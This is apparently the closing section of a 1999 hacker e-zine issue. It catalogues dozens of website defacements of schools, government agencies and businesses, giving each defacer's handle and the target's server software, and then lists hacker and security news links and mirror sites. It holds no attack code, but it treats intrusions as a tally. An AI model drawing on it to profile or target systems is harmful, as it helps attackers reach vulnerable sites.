      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.cornu.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cornu.ch 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.moneytopics.com
      Site Title: IPM 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.moneytopics.com 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.techtravel.ch
      Site Title: Tech Travel (CH) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.techtravel.ch 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.socialinfo.ch
      Site Title: Social Info (CH) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.socialinfo.ch
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.duqpart.com
      Site Title: Duquette & Partners, Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.duqpart.com 
      Defaced by: sSh 
      Operating System: Linux (Apache 1.3.4)
      
      
      Defaced domain: www.focal.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.focal.ch 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      
      
      Defaced domain: www.fullfat.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fullfat. 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
      
      Defaced domain: www.fifo.ch
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fifo.ch 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
      
      
      Defaced domain: www.cybergribouille.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cybergribouille.ch 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
      
      
      Defaced domain: www.wnym.com
      Site Title: Western New York Microcomputer, Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.wnym.com 
      Defaced by: sSh 
      Operating System: Linux (Apache 1.3.4)
      
      
      Defaced domain: www.ultramongolia.com
      Site Title: UltraMongolia 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ultramongolia.com 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.swisscentershanghai.com
      Site Title: SINOPTIC 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.swisscentershanghai.com 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0) 
       
      
      
      Defaced domain: dogwizard.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/dogwizard.com
      Defaced by: CodeZero 
      Operating System: Linux (Apache 1.3.6)
      There are hidden comments in the HTML.
       
       
      
      
      Defaced domain: www.sinoptic.ch
      Site Title: Sinoptic 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sinoptic.ch 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      
      
      
      Defaced domain: www.medtechnet.com
      Site Title: Med TechNet Online Information Services
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.medtechnet.com
      Defaced by: sSh 
      Operating System: Linux (Apache 1.3.4)
      
      Defaced domain: www.siavd.ch  
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.siavd.ch 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.digitoner.ch
      Site Title: DigiToner (CH) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.digitoner.ch 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.ipem.mg.gov.br
      Site Title: Instituto de Pesos e Medidas do Estado de Minas Gerais 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ipem.mg.gov.br 
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.guixe.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.guixe.com 
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.iug.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.iug.ch
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.sis-china.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sis-china.ch
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: www.reymondsa.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.reymondsa.ch
      Defaced by: acidklown 
      Operating System: Windows NT (Elogia Web Server 1.0) 
       
      Defaced domain: www.centovisi.ch
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.centovisi.ch 
      Defaced by: acidklown
      Operating System: Windows NT (Elogia Web Server 1.0)
       
       
      Defaced domain: meetingout.senate.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov
      Defaced by: sSh 
      Operating System: NT 
       
      Defaced domain: wsg6.ngdc.noaa.gov
      Site Title: National Oceanic and Atmospheric Administration
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wsg6.ngdc.noaa.gov
      Defaced by: Spykee 
      Operating System: Red Hat Linux (Apache 1.3.6) 
      
      Defaced domain: www.csc-ing.com
      Site Title: Computer Sciences Corporation 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.csc-ing.com 
      Defaced by: dagger 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: crack.neurobio.ucla.edu
      Site Title: University of California, Los Angeles 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/crack.neurobio.ucla.edu 
      Defaced by: spykee 
      Operating System: Red Hat Linux (Apache 1.3.3)
       
       
      Defaced domain: bing.ngdc.noaa.gov
      Site Title: National Oceanic and Atmospheric Administration 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/bing.ngdc.noaa.gov 
      Defaced by: Spykee 
      Operating System: Red Hat Linux (Apache 1.3.6)
      
      
      Defaced domain: www.jrtc-polk.army.mil
      Site Title: Joint Readiness Training Centre & Fort Polk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.jrtc-polk.army.mil 
      Defaced by: Pakistan Hackerz Club 
      Operating System: Windows NT
      
      
      Defaced domain: www.comunidadebr.com.br
      Site Title: Comunidade Brazil 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.comunidadebr.com.br 
      Defaced by: globher 
      Operating System: Windows NT
       
       
      Defaced domain: wwwnhc.nhmccd.cc.tx.us
      Site Title: North Harris College 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wwwnhc.nhmccd.cc.tx.us 
      Defaced by: sect0r 
      Operating System: Windows NT
      
      Defaced domain: www.lic.gov.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.lic.gov.uk 
      Defaced by: Kryptek 
      Operating System: Solaris (Apache 1.2.4) 
       
      Defaced domain: gw.fresno.gov
      Site Title: City of Fresno Gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/gw.fresno.gov 
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0) 
       
      URL: www.brick.net
      Defaced domain: www.brick.net
      Site Title: Loopback Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brick.net 
      Defaced by: cesar 
      Operating System: BSDI 3.0 (Apache 1.3.9)
       
      
      URL: www.afree.net
      Defaced domain: www.afree.net
      Site Title: A Free Net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.afree.net 
      Operating System: BSDI 3.0 (Apache 1.3.9)
      
      URL: intra-cas.faa.gov
      Defaced domain: intra-cas.faa.gov
      Site Title: Federal Aviation Administration 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/intra-cas.faa.gov 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0)
       
       
      URL: smagazine.simplenet.com
      Defaced domain: smagazine.simplenet.com
      Site Title: Simple Network Communications 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/smagazine.simplenet.com 
      Operating System: Solaris (Apache 1.3.9) 
      
      
      URL: www.nekipo.ee
      Defaced domain: www.nekipo.ee 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.nekipo.ee 
      Defaced by: verb0 
      Operating System: Windows NT (IIS/4.0) 
       
      
      URL: www.andmevara.ee
      Defaced domain: www.andmevara.ee 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.andmevara 
      Defaced by: verb0 
      Operating System: Windows NT (IIS/4.0)
      
      
      URL: bin.mis.bolton.ac.uk
      Defaced domain: bin.mis.bolton.ac.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bin.mis.bolton.ac.uk 
      Defaced by: s-n1nja 
      Operating System: Apache 1.2.5
       
       
      URL: www.anzwers.net
      Defaced domain: www.anzwers.net
      Site Title: Mythos Srl 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.anzwers.net 
      Defaced by: HiP 
      Operating System: Linux (Apache 1.3.6)
       
       
      URL: www.agmkt.state.ny.us
      Defaced domain: www.agmkt.state.ny.us
      Site Title: State of New York 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.agmkt.state.ny.us 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0) 
      
      Mass Hack: 
      URL: dongabank.co.kr
      Defaced domain: dongabank.co.kr 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/dongabank.co.kr 
      Defaced by: cybernetix 
      Operating System: Linux (Apache 1.3.9)
      Attrition comment: 53 other .kr domains defaced with this one
      
      URL: www.windesheim.nl
      Defaced domain: www.windesheim.nl
      Site Title: Windenheim 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.windesheim.nl 
      Defaced by: phr0st 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.sst.nrel.gov
      Site Title: National Renewable Energy Laboratory 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.sst.nrel.gov
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0) 
      
      Defaced domain: www.wines.shopwithme.com
      Site Title: Shop With Me - Wines 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.wines.shopwithme.com 
      Defaced by: DHC 
      Operating System: BSDI 3.0 (Apache 1.2.6)
      
      Defaced domain: www.ipsm.gov.br
      Site Title: Instituto de Previdência dos Servidores Militares do Estado de Minas Gerais
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ipsm.gov.br 
      Defaced by: globher 
      Operating System: Windows NT (IIS/3.0)
      
      Defaced domain: gw.fresno.gov
      Site Title: City of Fresno
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/gw.fresno.gov
      Defaced by: globher
      Operating System: NT
       
       
      
      
      Defaced domain: www.natall.com
      Site Title: National Alliance 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.natall.com 
      Defaced by: phr0st 
      Operating System: Windows NT (IIS/3.0) 
       
      Defaced domain: www.eseqex.ensino.eb.br
      Site Title: Escola de Equitação do Exército
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.eseqex.ensino.eb.br 
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.ccb.state.or.us
      Site Title: State of Oregon 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ccb.state.or.us 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: da_itc.da.gov.ph 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/da_itc.da.gov.ph 
      Defaced by: TREATY 
      Operating System: AIX 4.2 (Apache 1.2.4)
       
      
      
      Defaced domain: www.brasemb.or.jp
      Site Title: Embassy of Brazil in Tokyo 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brasemb.or.jp 
      Defaced by: globher 
      Operating System: Windows NT 
       
      Defaced domain: testwww.sos.state.ga.us
      Site Title: Georgia Secretary of State 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/testwww.sos.state.ga.us 
      Defaced by: secto0r 
      Operating System: Windows NT 
       
      Defaced domain: www.occs.state.or.us
      Site Title: Oregon State Board of Education Office of Community College Services 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.occs.state.or.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: mhs.pembrokeshire.ac.uk
      Site Title: Pembrokeshire College 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mhs.pembrokeshire.ac.uk 
      Defaced by: TREATY 
      Operating System: Solaris 
       
      Defaced domain: www.tingiris.com
      Site Title: Steve Tingiris 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.tingiris.com 
      Defaced by: vs 
      Operating System: Linux
       
       
      Defaced domain: www.cherokee.k12.ga.us
      Site Title: Cherokee County School System 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cherokee.k12.ga.us 
      Defaced by: secto0r 
      Operating System: Windows NT 
       
      Defaced domain: beta.lamison.com
      Site Title: The Lamison Press 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/beta.lamison.com 
      Defaced by: darkness 
      Operating System: Linux
       
       
      Defaced domain: www.coweta.k12.ga.us
      Site Title: Coweta County School System 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us 
      Defaced by: secto0r 
      Operating System: Windows NT 
       
      Defaced domain: www.superstition.com
      Site Title: www.superstition.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.superstition.com 
      Defaced by: TREATY 
      Operating System: NT 
       
      Defaced domain: www.ncc.gov.ph
      Site Title: Philippine National Computer Center 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ncc.gov.ph 
      Defaced by: TREATY 
       
       
      Defaced domain: www.melissa.com
      Site Title: Melissa Computer Systems 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.melissa.com 
      Defaced by: c0de red 
      Operating System: Solaris
       
       
      Defaced domain: www.hwa.net
      Site Title: Hoefer WYSOCKI Architects 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.hwa.net
      Defaced by: p4riah 
      Operating System: Windows NT
       
       
      Defaced domain: branson.k12.co.us
      Site Title: Branson School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/branson.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: avboces.k12.co.us
      Site Title: AV BOCES
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/avboces.k12.co.us
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: centennial.k12.co.us
      Site Title: Centennial School District
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/centennial.k12.co.us
      Defaced by: ytcracker 
      Operating System: Windows NT
      
      
      Defaced domain: mail.heidmar.net
      Site Title: Heidenreich Marine 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mail.heidmar.net 
      Defaced by: ieet 
      Operating System: Windows NT
       
       
      Defaced domain: hoehne.k12.co.us
      Site Title: Hoene School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/hoehne.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: fowler.k12.co.us
      Site Title: Fowler School District
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/fowler.k12.co.us
      Defaced by: ytcracker
      Operating System: Windows NT
       
       
      Defaced domain: kim.k12.co.us
      Site Title: Kim School District
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/kim.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: huerfano.k12.co.us
      Site Title: Huerfano School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/huerfano.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: bee.d93.k12.id.us
      Site Title: District 93 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bee.d93.k12.id.us 
      Defaced by: TREATY 
      Operating System: Linux
       
       
      Defaced domain: lasanimas.k12.co.us
      Site Title: Lasanimas School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lasanimas.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: lamar.k12.co.us
      Site Title: Lamar School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lamar.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: manzanola.k12.co.us
      Site Title: Manzanola School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/manzanola.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: laveta.k12.co.us
      Site Title: Laveta School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/laveta.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: mcclave.k12.co.us
      Site Title: McClave School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mcclave.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: www.dodge.k12.ga.us
      Site Title: Dodge School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.dodge.k12.ga.us 
      Defaced by: secto0r 
      Operating System: Windows NT
      
      
      Defaced domain: primero.k12.co.us
      Site Title: Primero School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/primero.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: plainview.k12.co.us
      Site Title: Plainview School District 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/plainview.k12.co.us 
      Defaced by: ytcracker 
      Operating System: Windows NT 
       
      Defaced domain: www.essex.ensino.eb.br
      Site Title: Essex Escola de Saude do Exercito
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.essex.ensino.eb.br
      Defaced by: globher
      Operating System: Windows NT
       
       
      Defaced domain: www.cis.pvt.k12.ca.us
      Site Title: Childrens International School
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cis.pvt.k12.ca.us 
      Defaced by: Nitr0BurN 
      Operating System: Linux 
       
      Defaced domain: www.coweta.k12.ga.us 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us 
      Defaced by: v00d00 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.pm.sc.gov.br
      Site Title: Polícia Militar de Santa Catarina - PMSC 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.pm.sc.gov.br 
      Defaced by: globher 
      Operating System: Apache 1.3.3 
       
      Defaced domain: www.srcs.k12.ca.us
      Site Title: K12 CA 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.srcs.k12.ca.us 
      Defaced by: Darkness 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.gibsonconsulting.com (Someone hacked a Gibson!) =)
      Site Title: Gibson & Associates, Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.gibsonconsulting.com 
      Defaced by: twd 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: saude.sc.gov.br
      Site Title: secretaria de saude de santa catarina 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/saude.sc.gov.br 
      Defaced by: JLM 
      Operating System: Windows NT (IIS/3.0)
       
      Defaced domain: bcmsc.k12.mi.us
      Site Title: K12 MI 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bcmsc.k12.mi.us 
      Defaced by: sSh 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.foreigntrade.gov.tr
      Site Title: Foreign Trade Turkey 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.foreigntrade.gov.tr 
      Defaced by: twd 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.mipsor.state.mi.us
      Site Title: Michigan Public Sexual Offender Query 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.mipsor.state.mi.us 
      Defaced by: ieet 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.familychildcare.org
      Site Title: Florida Family Child Care 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.familychildcare.org 
      Defaced by: sSh 
      Operating System: Linux (Apache 1.3.9)
      Attrition comment: Geniuses left off a > tag in TITLE. View source.
       
       
      Defaced domain: www.cybermoon.net
      Site Title: Cybermoon 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cybermoon.net 
      Defaced by: zeroc 
      Operating System: Linux (Apache 1.3.6)
       
      Defaced domain: www.scrf.gov.ru 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.scrf.gov.ru 
      Defaced by: ieet 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: support.gbcprotech.com
      Site Title: GBC Protech 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/support.gbcprotech.com 
      Defaced by: sSh 
      Operating System: Red Hat Linux (Apache 1.3.6)
 
 



        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
       
       



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The links are no longer maintained in this file; there is now a
      links section at http://welcome.to/HWA.hax0r.news/, so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net
      Finland ......: http://hackunlimited.com/
      Germany ......: http://www.alldas.de/
                      http://www.security-news.com/
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/
      Netherlands...: http://security.pine.nl/
      Russia........: http://www.tsu.ru/~eugene/
      Singapore.....: http://www.icepoint.com
      South Africa .: http://www.hackers.co.za
                      http://www.hack.co.za
                      http://www.posthuman.za.net
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? Email it to hwa@press.usmc.net and I'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]